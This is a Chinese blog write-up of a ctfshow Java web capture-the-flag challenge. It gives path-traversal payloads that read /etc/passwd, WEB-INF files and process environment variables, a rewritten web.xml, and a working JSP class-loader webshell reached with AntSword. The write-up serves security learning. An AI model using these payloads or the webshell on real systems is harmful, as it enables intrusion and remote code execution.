登陆不了 CTFshow

已于 2022-03-31 22:02:17 修改
阅读量580 收藏 1
点赞数 1
分类专栏: CTF 文章标签: web安全
于 2022-03-31 21:55:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/krysyal/article/details/123884435
版权
本文详细探讨了Web应用中的文件读取漏洞,从探测到利用,包括读取敏感文件如/etc/passwd,解析Java项目结构,反编译class文件寻找漏洞,以及如何利用web.xml重写实现远程命令执行。还介绍了利用环境变量获取信息的另一种解决方案。
摘要由CSDN通过智能技术生成

声明:此文仅供学习记录研究使用,切勿用于非法用途,否则后果自负!
参考文档

任意文件读取

在注册页面源代码处发现图片验证码的链接,尝试读取/etc/passwd
http://f5633ab6-dbd6-40cc-99d8-bce165cf784e.challenge.ctf.show/v/c?r=YzgxZTcyOC5qcGc=     #YzgxZTcyOC5qcGc= ==>c81e728.jpg
/etc/passwd ==> L2V0Yy9wYXNzd2Q=  (抓包重放时,绝对路径没有成功,改用相对路径)
../../../../../../../../../../../etc/passwd ==>Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
猜测根目录下存在flag文件
/ctfshowflag ==> L2N0ZnNob3dmbGFn
../../../../../../../../../../ctfshowflag ==> Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vY3Rmc2hvd2ZsYWcg  (尝试失败)

在这里插入图片描述

java项目敏感信息

WEB-INF主要包含一下文件或目录:
/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
/WEB-INF/database.properties:数据库配置文件
漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码

读取web.xml

../../../WEB-INF/web.xml ==> Li4vLi4vLi4vV0VCLUlORi93ZWIueG1s

在这里插入图片描述

读取pom.xml

../../../WEB-INF/pom.xml==>Li4vLi4vLi4vV0VCLUlORi9wb20ueG1s

在这里插入图片描述

读取tiny-framework并保存到本地进行反编译

发现tiny-framework,路径为
${basedir}\lib\tiny-framework-1.0.1.jar ==>/WEB-INF/lib/tiny-framework-1.0.1.jar
../../../WEB-INF/lib/tiny-framework-1.0.1.jar ==>Li4vLi4vLi4vV0VCLUlORi9saWIvdGlueS1mcmFtZXdvcmstMS4wLjEuamFy

在这里插入图片描述

保存到文件1.jar,反编译失败,jar文件打不开(文件二进制内容冗余大量的00,需要清除,剩余4个00)
winhex修改

在这里插入图片描述

再进行反编译

在这里插入图片描述

读取Index.class文件并进行反编译

没有发现index.class文件,那就应该在/WEB-INF/classes/
../../../WEB-INF/classes/com/ctfshow/controller/Index.class ==>Li4vLi4vLi4vV0VCLUlORi9jbGFzc2VzL2NvbS9jdGZzaG93L2NvbnRyb2xsZXIvSW5kZXguY2xhc3M=

在这里插入图片描述

将其返回内容再次保存到文件中,利用winhex去除多余的00
反编译发现有任意文件写入的漏洞,由于文件名限制为字母数字和.,所以并不能跨目录写文件,只能写到classes目录下

在这里插入图片描述

利用web.xml写jsp马

利用tomcat的热加载机制,重写web.xml,再写个对应的jsp马,写反弹shell即可

  • 原web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app version="3.0" 
	xmlns="http://java.sun.com/xml/ns/javaee" 
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
	xsi:schemaLocation="http://java.sun.com/xml/ns/javaee 
	http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd">
  <display-name></display-name>
    <filter>
        <filter-name>routerFilter</filter-name>
        <filter-class>com.ctfshow.filter.impl.RouterFilterImpl</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>routerFilter</filter-name>
        <url-pattern>/404.html</url-pattern>
        <url-pattern>/*</url-pattern>
        <dispatcher>REQUEST</dispatcher>
    </filter-mapping>
    <error-page>
        <error-code>404</error-code>
        <location>/404.html</location>
    </error-page>
    <session-config>
        <cookie-config>
            <name>ctfshow</name>
            <http-only>true</http-only>
        </cookie-config>
        <tracking-mode>COOKIE</tracking-mode>
    </session-config>
    <error-page>
        <error-code>400</error-code>
        <location>/404.html</location>
    </error-page>
</web-app>
  • 重写后的web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app version="3.0"
        xmlns="http://java.sun.com/xml/ns/javaee"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://java.sun.com/xml/ns/javaee
        http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd">
  <display-name></display-name>
    <filter>
        <filter-name>routerFilter</filter-name>
        <filter-class>com.ctfshow.filter.impl.RouterFilterImpl</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>routerFilter</filter-name>
        <url-pattern>/404.html</url-pattern>
        <url-pattern>/s/*</url-pattern>
        <dispatcher>REQUEST</dispatcher>
    </filter-mapping>
<servlet>
<servlet-name>ctfshow</servlet-name>  //新增一个servlet来映射到WEB-INF下的jsp文件
<jsp-file>/WEB-INF/1.jsp</jsp-file>  //路径ctfshow访问当前目录下的1.jsp
</servlet>
<servlet-mapping>
<servlet-name>ctfshow</servlet-name>
<url-pattern>/ctfshow</url-pattern>
</servlet-mapping>
</web-app>
  • jsp马
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
  • 利用(先写马)
username=web.xml&password=重写后的web.xml代码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xjoynnnS-1648734486205)(vx_images/1027958204233.png =800x)]

username=1.jsp&password=jsp马

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iLPXmy8r-1648734486205)(vx_images/1200655214935.png =800x)]

  • 蚁剑连接
http://2160fbb2-2fd9-4244-8fff-f6f029d8b226.challenge.ctf.show/ctfshow

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1gndQ4Fw-1648734486206)(vx_images/1931003210484.png =800x)]

  • flag
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4fhMcbJL-1648734486206)(vx_images/3380804210623.png =800x)]

解法二

直接去读取环境变量env
/proc/self/environ
../../../../../../../proc/self/environ==>Li4vLi4vLi4vLi4vLi4vLi4vLi4vcHJvYy9zZWxmL2Vudmlyb24=
../../../../../../../../../proc/1/environ==>Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vcHJvYy8xL2Vudmlyb24=

在 /proc 目录里, 每个正在运行的进程都有一个以该进程 ID 命名的子目录,
environ,该文件保存进程的环境变量, 各项之间以空字符分隔, 结尾也可能是一个空字符. 如果要输出进程 1 的环境变量:cat /proc/1/environ

读/proc/self/environ虽然是能读到该环境变量文件,但是我并没有发现flag
读/proc/1/environ可以,但是1是pid,进程号很多,猜到可能就是运气,如果有类似的题话可以试试

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zdHu9pRs-1648734486207)(vx_images/3701428222713.png =800x)]

这里读出来的flag和上面的不一样,是因为上面web.xml重写之后部分路由就没了,环境被弄坏了,就重开了,不然没法利用注册页面的验证码链接读文件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-liWbWeEu-1648734486207)(vx_images/5734333227752.png =800x)]

一心一易一
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
[RoarCTF 2019]Easy Java(java web
sleepywin的博客
12-29 1265
servlet:Servlet(Server Applet)是Java Servlet的简称,称为小服务程序或服务连接器,用Java编写的服务器端程序,具有独立于平台和协议的特性,主要功能在于交互式地浏览和生成数据,生成动态Web内容。总之,WEB-INF目录是Java Web应用程序中的一个特殊目录,包含了Web应用程序的配置文件、类文件和JAR文件等。WEB-INF是Java Web应用程序中的一个特殊目录,它位于Web应用程序的根目录下。此外如果想在页面访问WEB-INF应用里面的文件,
(详解)[RoarCTF 2019]Easy Java
m0_63705566的博客
03-01 6724
[RoarCTF 2019]Easy Java 打开题目 然后首先查看源代码和消息头,并没有什么额外的收获,于是我尝试sql注入,然后结果也失败了。 然后我点开了help 猜测这可能有文件下载漏洞,我尝试payload: 1 Download?filename={help.docx}   结果出乎意料的是 于是我尝试用POST方式来进行请求,结果却意外发现可以下载文件。下载了一个help.docx的文件。 ...
[RoarCTF 2019]Easy Java(web.xml)
weixin_45577185的博客
07-30 226
wp链接 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-INF/src/:源码目录,按照包名结
[RoarCTF 2019]Easy Java -不会编程的崽
最新发布
不会编程的崽的博客
03-14 666
java web路径 ctf 任意文件读取
[BUUCTF][RoarCTF 2019]Easy Java
cosmoslin的博客
11-18 1676
[RoarCTF 2019]Easy Java 考点 WEB-INF/web.xml泄露 解题 打开是一个登陆界面,根据题目这是一道java题,我们先寻找本页面的信息,除了login之外还有一个help,点击跳转 /Download?filename=help.docx 内容为 java.io.FileNotFoundException:{help.docx} 这里引入WEB-INF/web.xml泄露: WEB-INF是Java的WEB应用的安全目录。如果想在页面中直接访问其中的文件,必须通过web.
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
WEB-INF 基础知识
王嘟嘟的博客
04-08 5587
0x00 前言 对WEB-INF进行一个简单的了解。 0x01 正文 WEB-INF是java的WEB应用的安全目录。 1.WEB-INF目录 WEB-INF/web.xml web应用程序配置文件,描述了servlet和其他的应用组件配置及命名规则。 WEB-INF/classes 包含了站点所有用的class文件,包括servlet class和非servlet class WEB-INF/...
[RoarCTF 2019]Easy Java_wp
lzu_lfl的博客
03-31 194
Java源码泄漏
[RoarCTF 2019]Easy Java
m0_62905261的博客
08-12 374
[RoarCTF 2019]Easy Java
[RoarCTF 2019]Easy Java详解wp
qq_62984336的博客
04-09 1867
[RoarCTF 2019]Easy Java详解
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1904
[RoarCTF 2019]Easy Java
[RoarCTF 2019]Easy Java1
whale_waves的博客
11-13 239
WEB-INF是JAVA的WEB应用安全目录,如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。(用post的原因,为什么get访问返回访问码200说明有这个文件并且允许访问,但为什么没有数据,就想试试post)因为站点所有用的class文件都在WEB-INF/classes里,查看配置文件只知道了flag的位置。一般情况,isp引擎默认都是禁止访问WEB-INF目录的,在一些特定的场合(Nginx配合。有download,难道是下载文件,访问看看。
buuctf-[RoarCTF 2019]Easy Java JAVA WEB目录结构
2202_75317918的博客
10-02 285
找到对应文件名,然后通过这个文件名找到对应的servlet,再通过这个servlet的文件名,获取到其具体的servlet文件。因为这个是类中的文件,所以后缀要加.class。此外如果想在页面访问WEB-INF应用里面的文件,必须要通过web.xml进行相应的映射才能访问;所以我们要下载FlagController.class文件试一试。尝试直接访问/WEB-INF/web.xml,未找到文件。WEB-INF:Java的web应用安全目录;以为是文件包含,,但是不对。使用post传参试试。
RoarCTF 2019 Easy Java
weixin_44522540的博客
03-30 292
打开靶场,一个登陆界面,试了万能密码,行不通,点进help查看: 此时url:download,猜测是文件下载漏洞 burp抓包看下: 打开help.docx 哦豁,走远了 补充一下java web的目录结构 敏感目录 (1) /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 (2) /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能
ctfshow 数学不及格
09-02
根据提供的引用内容,ctfshow 数学不及格是一个问题,但是没有提供具体的解释或背景信息。因此,无法提供关于 ctfshow 数学不及格的详细解释和回答。如果您能提供更多的上下文或问题细节,我将非常乐意帮助您解答。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【ctfshow逆向 数学不及格】](https://blog.csdn.net/chuxuezhewocao/article/details/125042875)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [有一门课不及格的学生.cpp](https://download.csdn.net/download/weixin_46254319/12131086)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [ctfshow-数学不及格](https://blog.csdn.net/m0_73393932/article/details/129332790)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值